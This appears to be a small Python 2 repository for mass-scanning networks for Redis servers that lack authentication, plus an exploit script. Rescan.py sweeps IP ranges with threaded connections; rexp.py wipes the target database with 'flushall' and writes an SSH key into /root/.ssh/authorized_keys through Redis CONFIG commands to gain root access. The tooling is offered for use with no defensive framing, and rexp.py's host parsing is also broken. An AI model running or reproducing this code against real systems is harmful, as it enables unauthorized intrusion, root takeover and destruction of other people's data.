├── README.md
├── Rescan.py
└── rexp.py


/README.md:
--------------------------------------------------------------------------------
 1 | # Rescan
 2 | Redis Unauthorized Scan
 3 | ##Lib
 4 | 
 5 | https://github.com/google/ipaddr-py
 6 | ```shell
 7 | git clone https://github.com/google/ipaddr-py.git
 8 | cd ipaddr-py
 9 | sudo python setup.py install
10 | ```
11 | https://pypi.python.org/pypi/futures
12 | ```shell
13 | pip install futures
14 | ```
15 | 
16 | ##Usage
17 | ```shell
18 | python rescan.py -f  inputfile.txt 
19 | python rescan.py -i  192.168.1.1/24 -p 6379
20 | ```
21 |  inputfile.txt Format:
22 | ```
23 |  10.14.40.194:6379
24 |  10.14.40.194
25 | ```
26 | 
27 | 


--------------------------------------------------------------------------------
/Rescan.py:
--------------------------------------------------------------------------------
 1 | #coding=utf-8
 2 | #author=Cond0r@CodeScan
 3 | import socket
 4 | import threading
 5 | from concurrent import futures
 6 | from  Queue import Queue 
 7 | from sys import argv
 8 | import ipaddr
 9 | import sys
10 | socket.setdefaulttimeout(3)
11 | data='''
12 | Lib:
13 | 	https://github.com/google/ipaddr-py
14 | 	https://pypi.python.org/pypi/futures
15 | 	pip install futures
16 | Usage:
17 | 	python rescan.py -f  inputfile.txt 
18 | 	inputfile.txt:
19 | 		10.14.40.194:6379
20 | 	python rescan.py -i  192.168.1.1/24 -p 6379
21 | '''
22 | target_list=[]
23 | def stdout( name):
24 | 	scanow ='[*] Scan %s.. '%(name)
25 | 	sys.stdout.write(str(scanow)+" "*20+"\b\b\r")
26 | 	sys.stdout.flush()
27 | def extract_target(inputfile):
28 | 		global target_list
29 | 		inputdata=open(inputfile).read().replace("\r",'').split("\n")
30 | 		for host in inputdata:
31 | 			host=host.split(":")
32 | 			if len(host)==2:
33 | 				target_list.append("%s:%s"%(host[0],host[1]))
34 | 			elif len(host)==1:
35 | 				target_list.append("%s:6379"%(host[0]))	
36 | 		return target_list	
37 | def send_dbsize(conn):
38 | 	try:
39 | 		conn.send("dbsize\n")
40 | 		recv=conn.recv(5) 
41 | 		conn.close()	
42 | 		recv=recv.replace("\n",''),
43 | 		return recv
44 | 	except:
45 | 		return False
46 | 	
47 | def conn_redis(args):
48 | 	client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
49 | 	args=args.split(":")
50 | 	host=args[0]
51 | 	port=int(args[1])
52 | 	try:
53 | 		client.connect((host, port))
54 | 		return client
55 | 	except:
56 | 		return False
57 | def run_task(target):
58 | 	stdout(target)
59 | 	conn=conn_redis(target)
60 | 	if conn:
61 | 		size=send_dbsize(conn)
62 | 		size=str(size)
63 | 		if 'NOAUTH' not in size and ':' in size:
64 | 			return  "[!] Find %s Unauthorized  "% target		
65 | def main():
66 | 	targetlist=[]
67 | 	if len(argv)>2:
68 | 		if argv[1]=='-f':
69 | 			return extract_target(argv[2])
70 | 		if argv[1]=='-i':
71 | 			port=6379
72 | 			if len(argv)==5:
73 | 				port=int(argv[4])
74 | 			targets = ipaddr.IPv4Network(argv[2])
75 | 			for tar in targets:
76 | 				targetlist.append("%s:%d"%(tar,port))
77 | 			return targetlist
78 | 				
79 | 			
80 | 		
81 | if len(argv)<3:
82 | 	print data
83 | 	exit()
84 | 
85 | target_list=main()
86 | 
87 | thread_pool = futures.ThreadPoolExecutor(max_workers=10)
88 | for i in  thread_pool.map(run_task, target_list):
89 | 	if i!=None:
90 | 		print i
91 | 


--------------------------------------------------------------------------------
/rexp.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | from os import system
 3 | from sys import argv
 4 | def send(conn,cmd):
 5 | 	try:
 6 | 		conn.send(cmd+"\n")
 7 | 		recv=conn.recv(5) 
 8 | 		#conn.close()	
 9 | 		recv=recv.replace("\n",''),
10 | 		return recv
11 | 	except:
12 | 		return False
13 | 	
14 | def conn_redis(args):
15 | 	client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16 | 	args=args.split(":")
17 | 	host=args[0]
18 | 	port=int(args[1])
19 | 	try:
20 | 		client.connect((host, port))
21 | 		return client
22 | 	except:
23 | 		return False
24 | 		
25 | if len(argv)!=2:
26 | 	print "Usage: python rexp.py 127.0.0.1:6379"
27 | 	exit()
28 | host=argv[1]
29 | host.split(":")
30 | port=6379
31 | if len(host)==2:
32 | 	port=int(host[1])
33 | conn=conn_redis("%s:%d"%(host,port))
34 | send(conn,"flushall")
35 | system("cat foo.txt| redis-cli -h %s -p %d -x set pwn"%(host,port))
36 | cmd='''CONFIG set dir /root/.ssh/
37 | config set dbfilename authorized_keys
38 | save
39 | exit'''
40 | cmd=cmd.split("\n")
41 | for c in cmd:
42 | 	send(conn,c)
43 | 
44 | 
45 | 


--------------------------------------------------------------------------------